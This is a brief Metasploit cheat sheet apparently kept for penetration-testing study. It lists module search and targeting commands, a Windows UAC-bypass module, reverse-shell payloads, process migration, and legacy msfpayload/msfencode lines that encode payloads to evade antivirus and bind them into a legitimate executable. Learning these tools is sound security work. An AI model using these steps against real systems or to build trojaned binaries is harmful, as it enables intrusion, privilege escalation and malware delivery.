Metasploit

  • https://www.andreafortuna.org/2017/12/11/metasploit-console-my-own-cheatsheet/
  • https://www.offensive-security.com/metasploit-unleashed/Pivoting/
  • https://www.offensive-security.com/metasploit-unleashed/Portfwd/
  • https://www.offensive-security.com/metasploit-unleashed/proxytunnels/

General Commands:

show auxiliary
search snmp
use auxiliary/scanner/snmp/snmp_enum
info
show options
set RHOST ip
run
setg RHOST ip (global set)

Hosts:

db_nmap ip-range --top-ports 20 (to populate database)

Search Services:

services -p 443 (search all machines with 443 open)

Modifying exploit:

~/.msf4/modules/exploits/windows/misc/vulnserver.rb

Post exploitation

  • exploit/windows/local/bypassuac
  • set payload to reverse-shell (so that a new session will be created)
  • migrate to a system privileged process

Encode

msfpayload ............ | msfencode -e x86/shikata_ga_nai -t exe -c 9 -o exe.exe

(msfpayload and msfencode are the legacy tools; both were removed from the framework in 2015 and replaced by msfvenom)

Binding

msfpayload ............ | msfencode -e x86/shikata_ga_nai -t exe -c 9 -x goodexe.exe -o bound.exe

Auto Migrate

set AutoRunScript post/windows/manage/migrate